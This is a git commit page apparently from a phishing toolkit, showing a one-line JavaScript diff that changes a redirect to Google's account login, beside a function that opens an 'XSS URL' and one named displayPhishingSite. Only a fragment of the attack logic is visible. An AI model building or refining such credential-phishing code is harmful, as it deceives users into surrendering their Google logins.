Fixed Gmail Phishing by updating https://accounts.google.com/ServiceLogin to https://accounts.google.com/
This commit is contained in:
@@ -34,7 +34,7 @@ function redirect(){
|
||||
window.open(theXssUrl);
|
||||
window.focus();
|
||||
}
|
||||
window.location = "https://accounts.google.com/ServiceLoginAuth";
|
||||
window.location = "https://accounts.google.com/";
|
||||
}
|
||||
|
||||
function displayPhishingSite(){
|
||||
|
||||
Reference in New Issue
Block a user